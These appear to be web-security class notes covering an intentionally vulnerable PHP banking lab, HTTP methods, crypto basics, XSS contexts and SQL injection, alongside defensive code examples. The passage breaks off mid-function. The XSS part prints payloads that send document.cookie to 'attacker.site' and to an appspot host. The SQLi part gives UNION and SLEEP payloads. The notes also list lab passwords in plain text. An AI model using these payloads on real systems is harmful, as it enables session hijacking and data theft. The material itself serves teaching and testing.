Class Notes by Krishna

Uploaded by BrahmajiYedidi

https://www.virtualbox.org/

Ubuntu OVA
https://drive.google.com/file/d/1HQB0SSlvKiTEQelPizMKAXCA68gccB4h/view

Bridge mode (VM network adapter set to bridged, so the host can reach the VM directly)
Find out the VM IP address
ifconfig   (inside the Ubuntu VM)
ipconfig   (on the Windows host)

Try to access the Apache server from the host machine's browser (http://<vm-ip>/)

/etc/init.d/apache2 status

php --version

mysql -u root -p

Enter password: happy123$


Nautilus (file manager)

/var/www/html/sepwebapp/<code>

sudo nautilus   (the web root under /var/www/html is root-owned, so open the file manager as root to edit the app files)

https://github.com/krishnareddypadala/

PHP login logic (usercheck.php)

Pick up the username and password from the POST request
Verify whether the username and password are correct (look the user up in the database)

Correct      ----> user logged in (session created)
Not correct  ----> "Username or password is wrong" (one generic message for both cases, so the form does not reveal whether the username exists)

Connect to the DB from the terminal

SHOW DATABASES;
USE <db>;
SHOW TABLES;
SELECT ... FROM <table> WHERE <condition>;

CREATE DATABASE <db>;
CREATE TABLE <table> (...);

Tell about yourself? 20 mins


SQLi
XSS
CSRF
AuthN
XXE
Crypto
Burp Suite
IBM AppScan / HP WebInspect

200 mins

6 mins
5*4=20 mins
26 mins
https://github.com/krishnareddypadala/phpvulnbank

Login.html
Usercheck.php
singout.php
Profile.php
Feedback.php
Feedback_user.php
Feedback_admin.php
Transfer.php
Register.html
Register.php

Transfer.php

Inputs
fuser  <--- $_SESSION["uname"]  (taken from the server-side session, never from the request)
toacno <--- user input
tamnt  <--- user input

Process
fuser, toacno, tamnt (debit fuser's account, credit toacno)

Outputs

XML

Converting data (variables/objects) into a format that can be stored or sent is called serialization.
Turning that format back into variables is called deserialization.

Data ----> XML, transported to the server, XML ----> Data

<acno>1</acno>
<username>krishna</username>

JSON key:value

{"acno":1,"username":"krishna"}

Data ----> JSON, transported to the server, JSON ----> Data

On the server: JSON ----> Data, process, Data ----> JSON, send the JSON back to the browser

SOAP requests (XML)
JSON requests

<?xml version="1.0" encoding="UTF-8"?>


<root>
<name>phani</name>
<password>happy2$</password>
<email>[email protected]</email>
<tel>9876543210</tel>
</root>
POST /sepwebapp/usercheck.php HTTP/1.1
Host: krishnarp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Connection: close
Referer: http://krishnarp.com/sepwebapp/login.html
Upgrade-Insecure-Requests: 1

uname=krishna&pwd=happy123%24&login=Login

METHOD URL HTTP/1.1

GET, POST, OPTIONS, PUT, DELETE, HEAD, TRACE, CONNECT

PHP

$_REQUEST <--- contains both GET (query string) and POST (body) parameters

$_GET  <--- query-string parameters only (a parameter sent only in the POST body is not there; reading it gives an undefined-index notice)
$_POST <--- body parameters only (a parameter sent only in the query string is not there)

An application that reads credentials from $_REQUEST accepts them by either method. Try changing the method from POST to GET when critical information such as passwords is being sent; if the request is still accepted, mark it as a vulnerability: the password then sits in the URL and ends up in browser history, server and proxy logs, and the Referer header of the next request.
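The method-change check above, as an added example (not from the course notes or the phpvulnbank app): a small parser for raw HTTP requests as a proxy shows them, a parameter merge that behaves like PHP's $_REQUEST, the POST-to-GET rewrite, and a check for sensitive parameter names that end up in the URL. The sensitive-name list and the sample request (the login request captured above, with CRLF line endings) are constructed for the example.

```python
# Added example (not from the course notes): parse a raw HTTP request the way a
# proxy like Burp shows it, merge GET and POST parameters the way PHP's
# $_REQUEST does, and flag the "POST changed to GET" weakness: credentials that
# end up in the query string are written to browser history, proxy/server logs
# and the Referer header of the next request.
from urllib.parse import parse_qs, urlsplit

# Parameter names that should never travel in a URL (assumed list).
SENSITIVE = {"pwd", "password", "passwd", "pass", "otp", "token"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def header(req: dict, name: str) -> str:
    """Case-insensitive header lookup (HTTP header names are not case-sensitive)."""
    for k, v in req["headers"].items():
        if k.lower() == name.lower():
            return v
    return ""


def request_params(req: dict) -> dict:
    """Merge query-string and form-body parameters like PHP's $_REQUEST.
    $_GET would see only the first part, $_POST only the second."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(req["target"]).query).items()}
    if header(req, "Content-Type").startswith("application/x-www-form-urlencoded"):
        params.update({k: v[0] for k, v in parse_qs(req["body"]).items()})
    return params


def sensitive_params_in_url(req: dict) -> list:
    """Names of sensitive parameters carried in the URL (i.e. sent by GET)."""
    return sorted(SENSITIVE & set(parse_qs(urlsplit(req["target"]).query)))


def post_to_get(req: dict) -> str:
    """Rewrite a form POST as a GET with the same parameters: the manual
    method-change test from the notes. Body-related headers are dropped."""
    path = urlsplit(req["target"]).path
    kept = [f"{k}: {v}" for k, v in req["headers"].items()
            if k.lower() not in ("content-type", "content-length")]
    request_line = f"GET {path}?{req['body']} {req['version']}"
    return "\r\n".join([request_line] + kept) + "\r\n\r\n"


# Constructed sample: the login request captured in the notes, CRLF line endings.
LOGIN_POST = (
    "POST /sepwebapp/usercheck.php HTTP/1.1\r\n"
    "Host: krishnarp.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 41\r\n"
    "Connection: close\r\n"
    "\r\n"
    "uname=krishna&pwd=happy123%24&login=Login"
)

if __name__ == "__main__":
    req = parse_request(LOGIN_POST)
    print(req["method"], request_params(req), sensitive_params_in_url(req))
    as_get = parse_request(post_to_get(req))
    print(as_get["method"], request_params(as_get), sensitive_params_in_url(as_get))
```

If the application reads the credentials through $_REQUEST, the rewritten GET request logs the user in just like the original POST, and sensitive_params_in_url() names the parameter to put in the finding.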

demo.testfire.net
jsmith / Demo1234

http://zero.webappsecurity.com/login.html
username / password

http://testphp.vulnweb.com/
test / test

Find out which methods demo.testfire.net, zero.webappsecurity.com and testphp.vulnweb.com support with the help of the OPTIONS method (the Allow header in the response lists them).

Check for the POST to GET method change.

OPTIONS? ----> are DELETE / PUT / TRACE listed?
demo.testfire.net, zero.webappsecurity.com, testphp.vulnweb.com

Screenshot inside document?

Response

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 03:04:06 GMT
Server: Apache/2.4.27 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 458
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<h1>Transfer</h1>

<form name="transfer" action="transfer.php" onsubmit="return checkInp()" method="POST">

Tacount num:<input type="text" name="tacno"> <br><br>

Tamnt:<input type="text" name="tamt"><br><br>
<input type="submit" value="transfer">

<script>
function checkInp()
{
  /* client-side only: runs in the browser, so it is bypassed by sending the POST directly */
  var x=document.forms["transfer"]["tacno"].value;
  if(isNaN(x))
  {
    document.write(x+" is not a number");
    return false;
  }
  return true;
}
</script>

</form>

</html>
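The checkInp() check above runs only in the browser; anyone replaying the POST with curl or Burp never executes it. As an added example (not from the course notes or phpvulnbank), this is the server-side validation transfer.php needs regardless, written in Python. The account-number format, amount format and per-transfer cap are assumed business rules for the lab bank; the source account comes from the session, as the Transfer.php input notes above say, never from the request.

```python
# Added example (not from the course notes or phpvulnbank): server-side
# validation for the transfer form. The browser-side checkInp() is
# convenience only, so transfer.php must validate again.
import re
from decimal import Decimal

# Assumed business rules for the lab bank: account numbers are 1-12 digits,
# amounts are positive with at most two decimals and capped per transfer.
ACNO_RE = re.compile(r"[0-9]{1,12}")
AMOUNT_RE = re.compile(r"[0-9]{1,9}(\.[0-9]{1,2})?")
MAX_AMOUNT = Decimal("100000.00")


def validate_transfer(form: dict, session: dict) -> dict:
    """Return {"ok": bool, "errors": [...], "transfer": {...}} for one request.
    `form` is the POST body (tacno, tamt); `session` is server-side state.
    The strict regexes reject SQL syntax, 'NaN', 'Infinity', exponents and
    embedded whitespace before the value is ever used."""
    errors = []
    fuser = session.get("uname")
    if not fuser:
        errors.append("not authenticated")
    tacno = form.get("tacno", "")
    if not ACNO_RE.fullmatch(tacno):
        errors.append("tacno must be 1-12 digits")
    tamt = form.get("tamt", "")
    amount = None
    if not AMOUNT_RE.fullmatch(tamt):
        errors.append("tamt must be a positive decimal with at most 2 places")
    else:
        amount = Decimal(tamt)  # exact decimal, no float rounding of money
        if amount <= 0:
            errors.append("tamt must be greater than zero")
        elif amount > MAX_AMOUNT:
            errors.append("tamt exceeds the per-transfer limit")
    if session.get("acno") == tacno:
        errors.append("cannot transfer to the same account")
    if errors:
        return {"ok": False, "errors": errors, "transfer": None}
    return {"ok": True, "errors": [],
            "transfer": {"fuser": fuser, "from_acno": session.get("acno"),
                         "tacno": tacno, "tamt": amount}}


if __name__ == "__main__":
    session = {"uname": "krishna", "acno": "1"}
    print(validate_transfer({"tacno": "2", "tamt": "10.50"}, session))
    print(validate_transfer({"tacno": "2' OR 1=1--", "tamt": "-5"}, session))
```

Allow-list regexes (what the value must look like) are used instead of block-lists (what it must not contain): the question in the notes about client-side versus server-side input validation is answered by doing it here, on the server, and treating the JavaScript as usability only.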

1XX --- Informational (Continue / Switching Protocols)
2XX --- Success (OK)
3XX --- Redirect
4XX --- Client errors (e.g. 404 Not Found, 403 Forbidden, 405 Method Not Allowed)
5XX --- Server-side errors

Interview

Tell me about yourself?

JIRA / SNOW (ServiceNow) ticket received

Environment, test credentials and walkthrough <--- inputs

DAST

Automated: IBM AppScan / HP WebInspect

Run the scan ---> vulnerabilities ---> eliminate false positives ---> vulnerabilities that can be reported

Manual vulnerability assessment ---> extra vulnerabilities ---> vulnerabilities

Create report ---> sent to developer ---> read-out calls

Developer ---> fix delivered ---> re-test / revalidate ---> closed ---> good to go
Ticket closed

Tell me about yourself ---> 20 points --- 10 mins

SQLi --- 50 points --- 10 mins

XSS
CSRF
AuthN
AuthZ

10 * 10 ----> 100 mins = 1 hr 40 mins

500 points of notes

Tell about yourself? 5 mins

5 * 5 mins = 25 mins, 30 mins

50 MB video

A ----------------------------------------------------------------> B
Video ---- enc ---> Cipher V --------------> Cipher V ---- dec ----> Video

Assumed time for enc/dec: 1 MB per 1 sec

AES with a pre-shared 256-bit key

Video ---- enc + key ----> Cipher ----> dec ----> Video

50 sec (encrypt at A) + 50 sec (decrypt at B) = 100 sec

RSA applied to the whole video (the notes count each RSA step as two 50 sec passes; in practice asymmetric encryption is orders of magnitude slower than AES and is never used on bulk data)
Video ---- enc enc ---- Cipher ---- dec dec ---- Video

(50 + 50) + (50 + 50) = 200 sec

Key -- 256 bits

0100001010010010010100100100100101010101001001110101010011

1 MB -- 1 sec
1 MB = 1024 KB = 1024*1024 B = 1024*1024*8 bit = 8388608 bit -- 1 sec
256 bit ----------- 256/8388608 ≈ 0.00003 sec

Symmetric
AES(Data) + key ------------------------- AES(Data)   100 sec

Asymmetric, used only on the key (hybrid): RSA wraps the 256-bit AES key, AES still does the data
RPb(JPr(key)) ------------------------------> RPb(JPr(key))
0.00003 + 0.00003 at A, 0.00003 + 0.00003 at B = 0.00012 sec

Total: 100 + 0.00012 = 100.00012 sec
Associativity: (a+b)+c = a+(b+c)
6+5 ---> 11, 11+8 ---> 19
6+8 ---> 14, 14+5 ---> 19
6, 11, 14 ---> 19
11+14-6 = 19

Modulus: 17%4 = 1, 25%4 = 1

Hello Krishna, Have good day   (sample message)

MD5 --- hash of the message
RSA --- encrypt the hash with the private key: this is the digital signature. Anyone with the public key decrypts it and compares with their own hash of the message. MD5 is broken for this purpose (collisions are cheap); use SHA-256 in practice.

http://onlinemd5.com/

https://www.devglan.com/online-tools/rsa-encryption-decryption
RSA-Pb (public key):

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCZ/W0j1nv3Hbel4vZjDSyxV6Xt6fkLpH7
ek++uQqKqynORgYAsWdPRuC2uOUH9jsVli6UOlYh1w8zKIwZX3B0YQbnXLcdy9zr3ygWkXZK
FZaXFIYCpGIR/vutjwLKr424/B+KAmnAgXYUqEhS4uCEN5AH9aXDqson9z75kjGtHDQIDAQA
B

RSA-Pr(key): the AES key "sunday" encrypted with the RSA private key (tool demo; in a real exchange the sender encrypts the key with the recipient's public key so that only the recipient's private key can unwrap it)

ZlM5QdLmowtyeuW0mGXqMtX2qJmjyJnMqOsbZJdVCQGc2BsK6sjv5Up5WcBpLz0AyHwFMr
Uq5j6DiV7/vp1qXxI3nVY/mpKlsrVSs6Tl7YbeafcVt3W5/ZmST0O8NhjzYVWUrzkSMHQSuIZ0B
EshIzOo8zGkNWz2MekeNI3uux4=

KeyCipher ------->RSA + Pb ------------------>key --- sunday

AES-key(msg): the message encrypted with AES under the key "sunday"
r8gxRP6Fc7g5G9hry3ZD52mwZsiIUdR/PeGb2pVqtC5NOlQbiDJwNWgeDu/lbIsqhb03dZMhWP
4IvgT2hQsO7w==

Ciphertext ----------- AES + key ------------------> Clear text

https://www.devglan.com/online-tools/rsa-encryption-decryption
https://aesencryption.net/
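The two procedures worked through above (the hybrid scheme from the timing estimate, where RSA wraps only the 256-bit data key and the symmetric cipher does the bulk data, and the hash-then-sign step) as one added example. This is not code from the course notes or from the online tools linked above: the RSA is textbook RSA built here from scratch (no OAEP/PSS padding, a 512-bit modulus that is far too small for real use), and the symmetric cipher is a SHA-256 counter-mode keystream standing in for AES so that everything runs with the Python standard library only. Neither is safe to use as-is; in real code use a vetted library with AES-GCM and RSA-OAEP/PSS. Key generation uses the OS CSPRNG, which is the "CPRNG" the notes call for later.

```python
# Added example (not from the course notes): hybrid encryption (RSA wraps a
# fresh data key, a symmetric stream cipher encrypts the bulk data) and
# hash-then-sign, with toy textbook RSA and a SHA-256 keystream standing in
# for AES. For illustration only; not safe for real use.
import hashlib
import hmac
import os
import random
from math import gcd

_rng = random.SystemRandom()  # CSPRNG-backed (os.urandom)


def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin primality test with random bases."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a witness of compositeness was found
    return True


def random_prime(bits: int) -> int:
    while True:
        candidate = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # full size, odd
        if is_probable_prime(candidate):
            return candidate


def rsa_keygen(bits: int = 512):
    """Return ((n, e), (n, d)). 512 bits is a toy size; real keys are 2048+."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and gcd(e, phi) == 1:
            return (p * q, e), (p * q, pow(e, -1, phi))


def rsa_apply(m: int, key) -> int:
    """Textbook RSA: m^exp mod n, used with either the public or private exponent."""
    n, exp = key
    if not 0 <= m < n:
        raise ValueError("message too large for modulus")
    return pow(m, exp, n)


def stream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Counter-mode keystream from SHA-256 (toy stand-in for AES-CTR); XOR is
    its own inverse, so the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + i.to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def hybrid_encrypt(pub, plaintext: bytes) -> dict:
    """A fresh 256-bit data key encrypts the bulk data; RSA wraps only the key."""
    key, nonce = os.urandom(32), os.urandom(16)
    wrapped = rsa_apply(int.from_bytes(key, "big"), pub)  # 256-bit key < 512-bit n
    return {"wrapped_key": wrapped, "nonce": nonce,
            "ciphertext": stream_xor(key, nonce, plaintext)}


def hybrid_decrypt(priv, envelope: dict) -> bytes:
    key = rsa_apply(envelope["wrapped_key"], priv).to_bytes(32, "big")
    return stream_xor(key, envelope["nonce"], envelope["ciphertext"])


def sign(priv, message: bytes) -> int:
    """Hash, then apply the private exponent to the digest: the notes' MD5+RSA
    step, with SHA-256 in place of the broken MD5."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return rsa_apply(digest, priv)


def verify(pub, message: bytes, signature: int) -> bool:
    """Recover the digest with the public exponent and compare in constant time."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    recovered = rsa_apply(signature, pub)
    return hmac.compare_digest(recovered.to_bytes(64, "big"), digest.to_bytes(64, "big"))


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    msg = b"Hello Krishna, Have good day"
    env = hybrid_encrypt(pub, msg)
    print(hybrid_decrypt(priv, env) == msg, verify(pub, msg, sign(priv, msg)))
```

The cost model in the notes is visible in the structure: rsa_apply() runs once per direction on a 256-bit number, while stream_xor() runs over every byte of the payload, so the asymmetric step stays negligible however large the video is.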

Calculate 3+6*5-4/2-1 and submit answer as flag form.

3+6*5-4/2-1
30
Hello Krishna

2 bits -- binary, 2^2 = 4 values

00
01
10
11

3 bits -- 2^3 = 8 values (a 128-bit key has 2^128 possible values)
000
001
010
011
100
101
110
111

Secure Protocol: TLS 1.2

Cipher: AES128, 128-bit key
Hash Algorithm: SHA256, 256-bit output
Key Exchange: ECDHE_RSA (0xae06) 255 bits

https://www.ssllabs.com/ssltest/

IBM AppScan

https://www.dropbox.com/s/jqku41tj2k60odb/AppScan_Std_9.0.3.4_Eval_Win.exe?dl=0

https://demo.testfire.net

Cross Site Scripting - XSS

1) Simple HTML Context

In the body of an existing HTML tag or at the start and end of the page outside of the <html> tag.

<some_html_tag> user_input </some_html_tag>

In this context you can enter any kind of valid HTML in the user input and it would immediately be rendered by the browser; it is an executable context.

Eg: <img src=x onerror=alert(1)>

<script>alert(11)</script>

2) HTML Attribute Name Context

Inside the opening HTML tag, after the tag name or after an attribute value.

<some_html_tag user_input some_attribute_name="some_attribute_value"/>

In this context you can enter an event handler name and JavaScript code following an = symbol and get code execution, so it can be considered an executable context.

Eg: onclick="alert(1)"
<input type="text" name="uname">
<input onmouseover="alert(111)" type="text" name="uname">

3) HTML Attribute Value Context

Inside the opening HTML tag, after an attribute name separated by an = symbol.

<some_html_tag some_attribute_name="​user_input​" />


<some_html_tag some_attribute_name='​user_input​' />
<some_html_tag some_attribute_name=​user_input ​/>

There are three variations of this context:


- Double quoted attribute
- Single quoted attribute
- Quote less attribute

Code execution in this context would depend on the type of attribute in which the input appears. There
are different types of attributes:

a) ​Event attributes

These are attributes like onclick, onload etc and the values of these attributes are executed as JavaScript.
So anything here is the same as JavaScript context.

b) ​URL attributes

These are attributes that take URL as a value, for example src attribute of different tags. Entering a
JavaScript URL here could lead to JavaScript execution

Eg:​ javascript:some_javascript()
javascript:alert(111)

c) Normal attributes

If the input appears in a normal attribute value then this context must be escaped to lead to code execution. If the attribute is quoted then the corresponding quote must be used to escape the context. In the case of unquoted attributes a space (or tab/newline) ends the value. Once out of this context a new event handler can be added to lead to code execution.

Eg:
" onclick=alert(1)
' onclick=alert(1)
 onclick=alert(1)
4) HTML Comments Context
Inside the comments section of HTML

<!-- some_comment ​user_input​ some_comment -->

This is a non-executable context and it is required to come out this context to execute code. Entering a
--> would terminate this context and switch any subsequent text to HTML context.

Eg:​ --><img src=x onerror=alert(1)>

5) JavaScript Context

Inside the JavaScript code portions of the page.

<script>
some_javascript
user_input
some_javascript
</script>

This applies to the section enclosed by the SCRIPT tags, to event handler attribute values and to URLs beginning with javascript: .

Inside JavaScript user input could appear in the following contexts:


a) Code context
b) Single quoted string context
c) Double quoted string context
d) Single line comment context
e) Multi-line comment context

If user input is between SCRIPT tags then, no matter in which of the above contexts it appears you can
switch to the HTML context simply by including a closing SCRIPT tag and then insert any HTML.

Eg:​ </script><img src=x onerror=alert(1)>

If you are not going to switch to HTML context then you have to tailor the input depending on the specific
JavaScript context it appears in.

a) ​Code Context

function dev_func(input) {some_js_code}


dev_func(​user_input​);
some_variable=123;

This is an executable context, user input directly appears as an expression and you can directly enter
JavaScript statements and they will be executed.
Eg:​ $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

b) ​Single quoted string context

var some_variable='​user_input​';

This is a non-executable context and the user input must include a single quote at the beginning to switch
out of the string context and enter the code context..

Eg:​ '; $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

c) ​Double quoted string context

var some_variable="​user_input​";

This is a non-executable context and the user input must include a double quote at the beginning to
switch out of the string context and enter the code context..

Eg:​ "; $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

d) ​Single-line comment context

some_js_func();//​user_input

This is a non-executable context and the user input must include a new line character to terminate the
single line comment context and switch to the code context..

Eg:​ \r\n$.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

e) ​Multi-line comment context

some_js_func();
/*
user_input
*/
some_js_code

This is a non-executable context and the user input must include*/ to terminate the multi-line comment
context and switch to the code context..

Eg:​ */$.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

f) Strings being assigned to Executable Sinks

These are single quoted or double quoted string contexts but the twist is that these strings are passed to a function or assigned to a property that would treat this string as executable code.
Some examples are:
eval("user_input");
location = "user_input";
setTimeout("user_input", 1000);
x.innerHTML = "user_input";
document.write("user_input");

For more sinks refer the ​DOM XSS wiki​.

This should be treated similar to Code context.

6) CSS Context

Inside the CSS code portions of the page.

<style>
some_css
user_input
some_css
</style>

<div style="width:100px"></div>
This applies to the section enclosed by the STYLE tags and to style attribute values.

Injecting CSS in to a page itself could have some kind of impact of the page. For example, by changing
the location, visibility, size and z-index of the elements in a page it might be possible to make the user
perform an action different from what they think they are doing.

But the more interesting aspect is in how JavaScript can be executed from within CSS. Though not possible in modern browsers, older browsers did support JavaScript execution in two ways.

i. expression property
expression is an Internet Explorer only feature that allows execution of JavaScript embedded inside CSS.

css_selector
{
property_name: expression(some_javascript);
}

ii. ​JavaScript URLs


Some CSS properties like the background-image property take an URL as their value. In older browsers,
entering a JavaScript URL here would result in JavaScript code being executed.

css_selector
{
background-image: javascript:some_javascript()
}

<input type="text" name='uname' value='test'>

<input type="text" name='uname' value='T' onmouseover='alert(1111)'>
T' onmouseover='alert(1111)
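The fix for every context listed above is output encoding chosen per context, which is the answer to the "how do you stop XSS" and "what is output encoding" questions further down. As an added example (not from the course notes), the following Python encoders neutralise the attribute-breakout payload just shown, the </script> breakout from the JavaScript context, and the javascript: URL from the URL-attribute context. The profile page layout that places one untrusted value into four contexts is assumed for the example.

```python
# Added example (not from the course notes): output encoders for the HTML
# body/attribute, JavaScript string and URL-attribute contexts, and a renderer
# that applies the right one per slot. The page layout is assumed.
import html
import re
from urllib.parse import urlsplit


def encode_html(s: str) -> str:
    """HTML body and quoted-attribute contexts: & < > " ' become entities, so
    the value can neither close the attribute nor start a tag."""
    return html.escape(s, quote=True)


def encode_js_string(s: str) -> str:
    """JavaScript string context: every non-alphanumeric character becomes a
    \\xHH or \\uHHHH escape, so quotes, line terminators and </script> cannot
    terminate the string or the script block."""
    out = []
    for ch in s:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code < 256:
            out.append(f"\\x{code:02x}")
        else:
            out.append(f"\\u{code:04x}")
    return "".join(out)


_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def safe_url(s: str, fallback: str = "#") -> str:
    """URL-attribute context: allow only http(s) and relative URLs; anything
    else (javascript:, data:, vbscript:) is replaced by the fallback. Control
    characters and whitespace are stripped first because browsers ignore them
    inside a scheme, so "java\\tscript:" would otherwise slip through."""
    cleaned = _CTRL_WS.sub("", s)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme in ("http", "https", ""):
        return encode_html(cleaned)  # still an attribute value: entity-encode it
    return fallback


def render_profile(uname: str, site: str) -> str:
    """Put one untrusted value into four different output contexts."""
    return (
        f"<h1>Welcome {encode_html(uname)}</h1>\n"
        f"<input type=\"text\" name=\"uname\" value=\"{encode_html(uname)}\">\n"
        f"<a href=\"{safe_url(site)}\">homepage</a>\n"
        f"<script>var uname = \"{encode_js_string(uname)}\";</script>\n"
    )


if __name__ == "__main__":
    print(render_profile("T' onmouseover='alert(1111)", "javascript:alert(111)"))
    print(render_profile("</script><img src=x onerror=alert(1)>", "/profile.php?id=1"))
```

The encoder is selected by where the value lands, not by what the value looks like: the same uname string is entity-encoded in the body and the attribute, hex-escaped inside the script, and the URL slot gets an allow-list on the scheme because no amount of encoding makes javascript:alert(111) a safe href.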

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

<script>location.href="http://krishnasectest.appspot.com?cook="+document.cookie;</script>

<img src="https://image.shutterstock.com/image-photo/anonymous-hacker-without-face-uses-260nw-781107184.jpg">

XSS Notes: 30 to 50 points --- 9th, confirm it on WhatsApp

What is XSS (with diagram)?

What are the different types of XSS, with examples and diagrams?
What is reflected XSS?
What is stored XSS?
What is DOM-based XSS?
How do you identify XSS? Explain 3 output contexts with examples.
How do you stop XSS?
What is the difference between whitelisting and blacklisting?
Where do you keep input validation? Client side or server side?
What is output encoding? Explain with examples.
What are polyglots? Provide example polyglots.
XSS audio -- a new audio recording required from everyone -- 16th Nov

NoSQL = "Not only SQL"
MySQL -- SQL
MongoDB -- JSON documents

SQL Injection
When the user/attacker supplies SQL syntax instead of plain data and the application concatenates it into a dynamic query, the query sent to the database now contains the attacker's input as part of its code. Data being executed as code in this way is SQL injection.

In-band SQLi

In-band SQL Injection occurs when an attacker is able to use the same communication channel
to both launch the attack and gather results.

Error-Based:
Error-based SQLi is an in-band SQL Injection technique that relies on error messages
thrown by the database server to obtain information about the structure of the database.

Union Based Injection

Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL
operator to combine the results of two or more SELECT statements into a single result which is
then returned as part of the HTTP response.

Select * from banktable where acno='a' UNION SELECT * from empsaltable;#';

$acno = a' UNION SELECT * from empsaltable;#

The injected second SELECT runs as well: SELECT * from empsaltable;

SELECT * FROM banktable WHERE acno='a' AND '1'='2' UNION SELECT * FROM banktable where acno=5
(the AND '1'='2' empties the first result set, so only the injected rows are shown)

Select * from cbanktable where acno="aid";

aid = A" and 1=2 UNION select * from cbanktb;#

Select * from cbanktable where acno="A" and 1=2 UNION show tables";
-- does not work: SHOW TABLES is not a SELECT and cannot be UNIONed; use SELECT table_name FROM information_schema.tables instead

UNION requires both SELECTs to return the same number of columns with compatible types. A mismatch produces a database error, which is itself useful for error-based discovery of the column count: add NULL columns one at a time until the error goes away.
Inferential SQLi (Blind SQLi)

In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as "blind SQL injection attacks").

Two variants:
Boolean-based (content-based) blind SQLi
Time-based blind SQLi

Boolean-based (content-based) Blind SQLi

Boolean-based SQL injection is an inferential SQL injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer whether the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

Time-based Blind SQLi

Time-based SQL injection is an inferential SQL injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer whether the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

SQL Server ---- WAITFOR DELAY '00:00:15'

MySQL ---- SLEEP() and BENCHMARK()

Working eg # http://krishnarp.com/marwebapp/retrivedata.php?sno=1 and SLEEP(3)

Conditional delay: IF (condition, e.g. the current user is root) WAITFOR DELAY '00:00:10' on SQL Server; in MySQL, AND IF(condition, SLEEP(10), 0)
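The union-based and boolean-based blind techniques above, as one added example (not from the course notes or phpvulnbank) run against an in-memory SQLite copy of the lab's bank tables; the table names and rows are constructed. It shows the concatenated query and its UNION exfiltration of another table, the error-based column-count discovery, the parameterised fix, and a boolean-blind loop that recovers a value through nothing but a "row shown / row not shown" oracle. SQLite comments with -- rather than MySQL's #, and it has no SLEEP(), so the time-based variant is not shown; its inference loop is identical, only the oracle changes from "page differs" to "page is late".

```python
# Added example (not from the course notes): union and boolean-blind SQL
# injection against a constructed in-memory SQLite database, plus the
# parameterised fix. Table names and rows are made up for the example.
import sqlite3


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE banktable(acno TEXT, holder TEXT, balance REAL);
        CREATE TABLE empsaltable(empid TEXT, name TEXT, salary REAL);
        INSERT INTO banktable VALUES ('1', 'krishna', 1500.0), ('2', 'phani', 320.5);
        INSERT INTO empsaltable VALUES ('e7', 'ceo', 99000.0), ('e9', 'dba', 72000.0);
    """)
    return conn


def lookup_vulnerable(conn, acno: str):
    """retrivedata.php-style dynamic query: the input is concatenated into SQL."""
    sql = "SELECT acno, holder, balance FROM banktable WHERE acno='" + acno + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, acno: str):
    """Same query with a bound parameter: the input can only ever be a value."""
    return conn.execute(
        "SELECT acno, holder, balance FROM banktable WHERE acno=?", (acno,)).fetchall()


# Empty first result set, then the other table's rows appended via UNION.
UNION_PAYLOAD = "x' UNION SELECT empid, name, salary FROM empsaltable--"


def count_columns(conn, max_cols: int = 8) -> int:
    """Error-based column-count discovery for UNION: add NULLs until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
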